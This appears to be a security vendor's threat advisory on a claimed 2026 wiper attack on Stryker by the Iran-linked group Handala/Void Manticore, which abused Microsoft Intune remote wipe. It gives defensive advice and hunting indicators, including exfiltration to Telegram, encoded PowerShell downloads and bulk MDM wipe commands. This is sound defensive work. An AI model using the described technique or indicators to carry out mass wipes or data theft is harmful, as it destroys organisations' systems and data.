TLDR;

On March 11, 2026, the Iran-linked hacktivist group Handala claimed a devastating wiper attack against Stryker Corporation, one of the world's largest medical device manufacturers. The attackers allegedly wiped 200,000+ devices across 79 countries by abusing Microsoft Intune's remote wipe capability. This is not an isolated incident — it is a deliberate geopolitical escalation targeting US companies. If your organization uses Intune or has relationships with Stryker, this document tells you what to look for and what to do right now.

WHAT HAPPENED: THE STRYKER ATTACK

Stryker Corporation — Fortune 500, $25 billion in annual revenue, 56,000 employees, operating in over 60 countries — woke up on March 11, 2026, to find their global IT infrastructure wiped.

The attack began early Wednesday morning. Employees across the United States, Europe, Asia, and other regions suddenly found themselves locked out of laptops, phones, internal systems, and corporate communications. On every affected device running Windows, one thing appeared in place of the Stryker login screen: the logo of Handala, an Iran-linked hacktivist group.

Who Is Handala / Void Manticore?

Handala presents itself as a pro-Palestinian hacktivist group that emerged in late 2023, but the Handala persona is the public face of a much older and more sophisticated actor.

Behind the Handala brand, multiple independent security researchers — including Palo Alto Networks Unit 42, Brandefense, and Microsoft — assess with high confidence that Handala is one of several online personas maintained by Void Manticore, an Iranian state-linked threat actor that has been operating since at least 2022. Void Manticore is tracked across the industry under several names:

• Void Manticore (Palo Alto Unit 42)
• STORM-842 / Storm-0842 (Microsoft)
• Homeland Justice (early campaign name, 2022)
• BANISHED KITTEN (CrowdStrike)
• Karma (alternate persona)

The group is assessed to operate in alignment with Iran's Ministry of Intelligence and Security (MOIS), acting as a strategic extension of Iranian state interests while maintaining plausible deniability through its hacktivist framing. Their operations are explicitly political: public statements, leak packages, and social media narratives are all designed to align with and amplify Iranian state messaging.

Void Manticore's technical toolkit is layered and evolving:

• Phishing and credential harvesting using highly convincing current-event lures, often spoofing legitimate security vendors or government agencies
• Exploitation of unpatched internet-facing services: VPN gateways, web servers, and remote access solutions are common initial access vectors alongside phishing
• Living-off-the-land lateral movement using PowerShell, scheduled tasks, and native OS tools — minimizing the malware footprint and evading detection
• Custom multi-stage wiper malware targeting both Windows and Linux environments, including known families CaddyWiper and ZeroCleare
• Wipers that masquerade as ransomware — they display ransom-style messages, but no decryption mechanism exists. The goal is destruction, not payment
• Coordinated information operations: exfiltrated data is published to 
  Telegram channels and social media as a deliberate post-compromise phase, designed to amplify political and reputational damage beyond the technical disruption
• Website defacement for propaganda effect and psychological pressure

Their campaign history spans multiple geographies and sectors: government ministries in the Balkans (Operation Homeland Justice, 2022), critical infrastructure in Israel (2023), and Western NGOs and think tanks (2024-2025). The Stryker attack is the most significant targeting of a US company to date — a clear escalation following US military involvement in the Iran conflict.

Why Stryker?

Handala's manifesto cited Stryker's 2019 acquisition of OrthoSpace, an Israeli medical technology company, as the basis for targeting the firm. 

The message from Handala is explicit: any company with business ties to Israel — acquisitions, partnerships, shared customers, investment relationships — is a potential target. Stryker was not targeted because of a cybersecurity failure. It was targeted because of its business history.

How the Attack Was Executed

This is where security teams need to pay close attention. Based on reporting from KrebsOnSecurity, investigators believe the attackers did not deploy traditional wiper malware in the initial phase. Instead, they abused a legitimate Microsoft enterprise tool:

This attack vector matters because it means traditional endpoint detection tools may not have flagged the initial phase. The wipe was executed through legitimate administrative channels. This is what makes it particularly difficult to detect and defend against — and why access control to MDM admin accounts is now a critical priority.

Scale of Impact

• Global operations crippled: All 56,000+ employees affected in 79+ countries
• Ireland headquarters hit hardest: 5,000+ Cork facility workers immediately unable to work
• Manufacturing disruption: Engineering, product design, quality control, and supply chain systems offline
• Patient care risk: Hospitals relying on Stryker medical devices face potential supply chain disruption
• Stock impact: Stryker shares fell approximately 4% within hours of the attack becoming public
• Recovery timeline: Unknown — wiper attacks cause permanent data loss with no recovery mechanism for wiped devices

Healthcare organizations and any company that partners with, procures from, or shares data with Stryker should take immediate action across three areas.

1. Your Data at Stryker May Be Exposed

Handala claims to have exfiltrated 50 terabytes of data before executing the wipe. Take that number with appropriate skepticism — threat actors routinely exaggerate — but the category of data is what matters.

Think through what your organization has shared with Stryker over the past several years:

• Procurement data, contracts, and pricing information
• Technical integration data, device configurations, and implant records
• Employee data for joint projects, training, or access provisioning
• Patient outcome data shared for product development, clinical trials, or quality improvement
• Network topology or technical documentation for device integration projects

You may not know definitively what was taken. Assume the worst and investigate accordingly. If you have shared sensitive data with Stryker, consult your legal and privacy teams about notification obligations now.

2. Watch for Stryker-Themed Phishing Immediately

Handala's playbook is well-documented. Phishing is their primary initial access vector. After a high-profile attack like this, follow-on phishing campaigns targeting Stryker's customers and partners are not just possible — they are likely.

Expect lures that exploit the current chaos:

• Emails purporting to be from Stryker security or IT teams about account access, system recovery, or device re-enrollment
• Fake "urgent notices" about affected devices or compromised data, designed to drive clicks before recipients think critically
• Spoofed domains mimicking Stryker communications (stryker-security[.]com, stryker-support[.]net, etc.)
• Vendor impersonation from partners claiming to help Stryker customers during the outage

3. Assess Your Stryker-Connected Devices and Integrations

Hospitals and healthcare systems in particular should immediately inventory their Stryker device footprint:

• Identify all Stryker-manufactured devices connected to your network, including surgical equipment, hospital beds, imaging systems, and implant programming equipment
• Check for any devices that communicate back to Stryker systems — if Stryker's infrastructure is compromised, those connections may need to be suspended pending assessment
• Review network segmentation for your medical device environment: are Stryker devices on isolated segments, or do they have paths to clinical systems or patient data?
• Contact your Stryker account representative through verified channels to understand which product lines are affected and what guidance they are providing
• Do not attempt to reconnect devices to Stryker cloud services until you receive verified guidance from Stryker's security team
  

What Every Security Team Should Do Now

The Stryker attack is not an isolated incident. It is a preview. As geopolitical tensions between the US, Israel, and Iran remain elevated, other US companies with business connections to Israel — acquisitions, investments, partnerships, customers — should treat this as a direct warning.

Here is what the 7AI security team is advising based on this attack:

Lock Down Microsoft Intune and MDM Admin Access

This is the most urgent action on this list. If Intune admin credentials were the attack vector at Stryker, every organization using Microsoft Intune is running the same risk unless they have implemented privileged access controls.

A compromised Intune admin account can wipe your entire device fleet in minutes. No malware required. No endpoint detection will catch it. You need to make that capability require more than a username and password to activate.

If you cannot implement PIM immediately, these compensating controls reduce your risk:

• Enable Conditional Access policies requiring hardware MFA (FIDO2/phishing-resistant) for all MDM admin accounts
• Restrict Intune admin access to specific managed, compliant devices from NamedLocations — not general workstations from coffee shops
• Create an alert for bulk wipe commands (any wipe of more than 3-5 devices in a short window should trigger immediate investigation)
• Regularly audit active Intune Administrator assignments and remove unnecessary permanent assignments
• Review and restrict the scope of service accounts with MDM permissions

Treat Wiper Attacks as a Distinct Threat Class

Security teams have spent years optimizing for ransomware. Wiper attacks require a different response posture. The key difference: there is no negotiation, no decryption key, and no recovery path for wiped devices.

Your incident response plan almost certainly has a ransomware playbook. Does it have a wiper playbook? If not, build one now. Key elements:

• Offline, air-gapped backups are non-negotiable: Backups connected to your network are vulnerable to the same wipe command
• Recovery time objectives for mass device wipe: How long does it take to re-image 500 laptops? 5,000? Do you have the hardware, imaging infrastructure, and OS licenses staged to do it quickly?
• Device inventory: Do you know every device enrolled in your MDM? An accurate, current inventory is the foundation of any wipe response
• Communication plan for zero IT access: If your email, Slack, and internal systems are all wiped simultaneously, how do you communicate? Have an out-of-band plan

Reassess Your Third-Party Risk Through a Geopolitical Lens

Stryker was targeted not because of a technical vulnerability, but because of a business relationship. That changes the third-party risk calculation.

Traditional third-party risk assessments focus on: Does this vendor have good security controls? The Stryker attack adds a new question: Is this vendor a target for geopolitically motivated adversaries, and if they are breached, what does our exposure look like?

For each high-risk vendor, assess: what data have we shared, what network integrations exist, and what is our exposure if they are wiped?

Review contractor and partner access: Stryker likely has partner accounts and contractor access across its customer base. Those accounts may have been compromised

Patch Your Perimeter — VPNs and Web Servers First

Phishing gets the headlines, but Void Manticore also gains initial access by exploiting unpatched internet-facing services. VPN gateways, web servers, and remote management consoles have all been used as entry points. If your last VPN firmware update was more than a few weeks ago, that is the first thing to check.

• Audit and patch all internet-facing VPN gateways, web servers, and remote access solutions — these are active initial access vectors for this actor
• Review exposure of remote management consoles (RDP, SSH, admin panels) and confirm they are not directly accessible from the internet
• Check for any unusual authentication patterns against VPN or web portals from the past 30 days
• Enforce phishing-resistant MFA (FIDO2/hardware tokens) on all remote access — credential harvesting after phishing is the other primary entry path

Hunt for Void Manticore TTPs in Your Environment

If you have threat hunting capability, run queries for Void Manticore's known indicators now. The group's tactics are well-documented across multiple research sources:

Initial Access Indicators

• Phishing emails using current-event lures (Iran conflict, OrthoSpace, Stryker recovery, geopolitical subject lines)
• Authentication attempts against VPN gateways and web-facing admin consoles from unusual geolocations or at unusual hours
• New scheduled tasks created by non-standard accounts (living-off-the-land persistence method)
• Anomalous PowerShell execution — encoded commands, downloads from external hosts, unusual parent processes

Lateral Movement and Escalation

• AutoIT script execution from unusual directories
• Unexpected RegAsm.exe processes
• NSIS installer packages with no file extensions
• Rapid lateral movement following initial access, especially targeting privileged admin and MDM accounts

Destructive Phase Indicators

• Bulk MDM wipe commands issued outside change windows
• Bulk file overwrite activity (4KB block patterns — CaddyWiper/ZeroCleare signature)
• Wiper payload masquerading as ransomware: ransom note present but no decryption key infrastructure
• Outbound connections to Telegram channels (Void Manticore has used Telegram as exfiltration destination and C2)
• Large-volume outbound data transfers preceding wipe activity — exfiltration precedes destruction

Prepare a Dual-Track Response: Technical AND Communications

Void Manticore's model demands a response that goes beyond IT recovery. The group treats data exfiltration as ammunition, not just leverage. After executing the technical attack, they publish curated leak packages to Telegram and social platforms to drive media coverage and erode stakeholder trust. Your communications team needs to be in the room from the first hour of an incident — not brought in after the technical response is underway.

Prepare now, before you need it:

• Maintain current emergency contact lists for leadership, legal, IR partners, and insurance carriers in a location that survives a full wipe
• Draft initial breach notification and customer communication templates and store them offline — your email may be down
• Brief your PR and communications team on what a Void Manticore-style leak operation looks like: expect selective, timed releases of data designed for maximum impact
• Prepare a monitoring plan for your company name on Telegram channels and dark web forums — early detection of leak activity gives you a response window
• Know your cyber insurance notification requirements and deadlines — missing them because your systems are wiped can invalidate coverage
• Run a tabletop exercise that simulates a combined wiper attack and coordinated data leak: your legal, comms, IT, and executive teams should all participate, because in a real Void Manticore attack, all of them will be needed at the same time

The Bigger Picture

This attack marks a new phase. Until now, US companies largely sat outside the direct targeting scope of Iran-linked destructive cyber operations. The Stryker attack appears to be the first known major wiper attack on a US company in the current Iran conflict.

FBI Director Kash Patel posted publicly on the day of the attack that the FBI is working 24/7 to address the threat. The US government is treating this as a serious escalation. You should too.

Handala's statement called this "only the beginning of a new chapter in the cyber war." Whether that is propaganda or operational intent, the security posture implication is the same: the threat is elevated, it is geopolitically driven, and it is not going away when the news cycle moves on.

The question for every security team right now is not whether they have enough budget or enough tools. It is whether they have enough visibility, fast enough investigation, and the right access controls in place to catch an attack moving at the speed and scale of Stryker before it reaches catastrophic.

Immediate Action Checklist

Note: Timing column (Today / 24-48 hrs / This week) is indicated by row background color — red for immediate, amber for near-term, green for this week.